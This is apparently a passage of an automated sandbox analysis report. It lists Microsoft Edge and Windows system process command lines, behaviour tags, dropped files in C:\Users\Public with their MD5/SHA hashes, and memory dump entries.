C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff61cad5460,0x7ff61cad5470,0x7ff61cad54806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3600 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1284 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3152 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3216 /prefetch:85⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\kfx5819s5bFilesize
1KB
MD55cf964f4fb92692d8ce2172ed6ad931e
SHA15cb6c7ac83b91ef93bfc77eca1e349913055a9d6
SHA2568d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4
SHA512109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6
-
C:\Users\Public\kfx5819s5bFilesize
1KB
MD55cf964f4fb92692d8ce2172ed6ad931e
SHA15cb6c7ac83b91ef93bfc77eca1e349913055a9d6
SHA2568d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4
SHA512109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6
-
C:\Users\Public\kfx5819s5bFilesize
1KB
MD55cf964f4fb92692d8ce2172ed6ad931e
SHA15cb6c7ac83b91ef93bfc77eca1e349913055a9d6
SHA2568d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4
SHA512109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6
-
C:\Users\Public\oz4xz8wjjjd3Filesize
4KB
MD574aa8efaba61b11cbb7a21a6f114daa1
SHA13b0b3a65e3c186229ce65fa7b51d95e56972a892
SHA25619ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42
SHA512d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b
-
C:\Users\Public\oz4xz8wjjjd3Filesize
4KB
MD574aa8efaba61b11cbb7a21a6f114daa1
SHA13b0b3a65e3c186229ce65fa7b51d95e56972a892
SHA25619ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42
SHA512d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b
-
C:\Users\Public\oz4xz8wjjjd3Filesize
4KB
MD574aa8efaba61b11cbb7a21a6f114daa1
SHA13b0b3a65e3c186229ce65fa7b51d95e56972a892
SHA25619ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42
SHA512d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b
-
C:\Windows\Installer\MSID5C3.tmpFilesize
54KB
MD5eadaaa6edab657ed52d0b76325494469
SHA10c3b0c61e91857f715e737276c7fcd066117095d
SHA256ec0ac9068fa7c0e422f0f090efb31e335ef87439bb5034e98a6d9f1a6e292acb
SHA512df8d3602f086b2a84b203f489a678f0e0c0ad2ae2114b24619e61d4c780969dc267719d9a29d4ba8ae15acdc32afeb7982437570b51e465a362ce6a53b4bd621
-
C:\Windows\Installer\MSID5C3.tmpFilesize
54KB
MD5eadaaa6edab657ed52d0b76325494469
SHA10c3b0c61e91857f715e737276c7fcd066117095d
SHA256ec0ac9068fa7c0e422f0f090efb31e335ef87439bb5034e98a6d9f1a6e292acb
SHA512df8d3602f086b2a84b203f489a678f0e0c0ad2ae2114b24619e61d4c780969dc267719d9a29d4ba8ae15acdc32afeb7982437570b51e465a362ce6a53b4bd621
-
\??\pipe\LOCAL\crashpad_1344_IITJZNSHCXTOUKFDMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/320-165-0x0000000000000000-mapping.dmp
-
memory/376-149-0x0000000000000000-mapping.dmp
-
memory/612-162-0x0000000000000000-mapping.dmp
-
memory/748-136-0x0000000000000000-mapping.dmp
-
memory/928-131-0x0000000000000000-mapping.dmp
-
memory/928-143-0x00000259967E0000-0x00000259967EC000-memory.dmpFilesize
48KB
-
memory/956-142-0x0000000000000000-mapping.dmp
-
memory/1048-148-0x0000000000000000-mapping.dmp
-
memory/1308-152-0x0000000000000000-mapping.dmp
-
memory/1344-145-0x0000000000000000-mapping.dmp
-
memory/1508-168-0x0000000000000000-mapping.dmp
-
memory/1508-178-0x0000000000000000-mapping.dmp
-
memory/1912-158-0x0000000000000000-mapping.dmp
-
memory/2224-130-0x0000000000000000-mapping.dmp
-
memory/2288-146-0x0000000000000000-mapping.dmp
-
memory/2648-144-0x000001F8A20A0000-0x000001F8A20A3000-memory.dmpFilesize
12KB
-
memory/2712-176-0x0000000000000000-mapping.dmp
-
memory/2736-167-0x0000000000000000-mapping.dmp
-
memory/3108-154-0x0000000000000000-mapping.dmp
-
memory/3124-170-0x0000000000000000-mapping.dmp
-
memory/3132-172-0x0000000000000000-mapping.dmp
-
memory/3416-169-0x0000000000000000-mapping.dmp
-
memory/3660-164-0x0000000000000000-mapping.dmp
-
memory/3668-177-0x0000000000000000-mapping.dmp
-
memory/3704-200-0x0000000000000000-mapping.dmp
-
memory/3736-180-0x0000000000000000-mapping.dmp
-
memory/4164-156-0x0000000000000000-mapping.dmp
-
memory/4240-160-0x0000000000000000-mapping.dmp
-
memory/4340-198-0x0000000000000000-mapping.dmp
-
memory/4356-175-0x0000000000000000-mapping.dmp
-
memory/4376-196-0x0000000000000000-mapping.dmp
-
memory/4468-137-0x0000000000000000-mapping.dmp
-
memory/4484-171-0x0000000000000000-mapping.dmp
-
memory/4520-140-0x0000000000000000-mapping.dmp
-
memory/4680-163-0x0000000000000000-mapping.dmp
-
memory/4784-173-0x0000000000000000-mapping.dmp
-
memory/4828-166-0x0000000000000000-mapping.dmp
-
memory/5068-182-0x0000000000000000-mapping.dmp
-
memory/5264-202-0x0000000000000000-mapping.dmp
-
memory/5420-183-0x0000000000000000-mapping.dmp
-
memory/5428-184-0x0000000000000000-mapping.dmp
-
memory/5436-185-0x0000000000000000-mapping.dmp
-
memory/5560-186-0x0000000000000000-mapping.dmp
-
memory/5572-187-0x0000000000000000-mapping.dmp
-
memory/5608-188-0x0000000000000000-mapping.dmp
-
memory/5700-189-0x0000000000000000-mapping.dmp
-
memory/5712-190-0x0000000000000000-mapping.dmp
-
memory/5740-191-0x0000000000000000-mapping.dmp
-
memory/5836-192-0x0000000000000000-mapping.dmp
-
memory/5876-193-0x0000000000000000-mapping.dmp
-
memory/5912-194-0x0000000000000000-mapping.dmp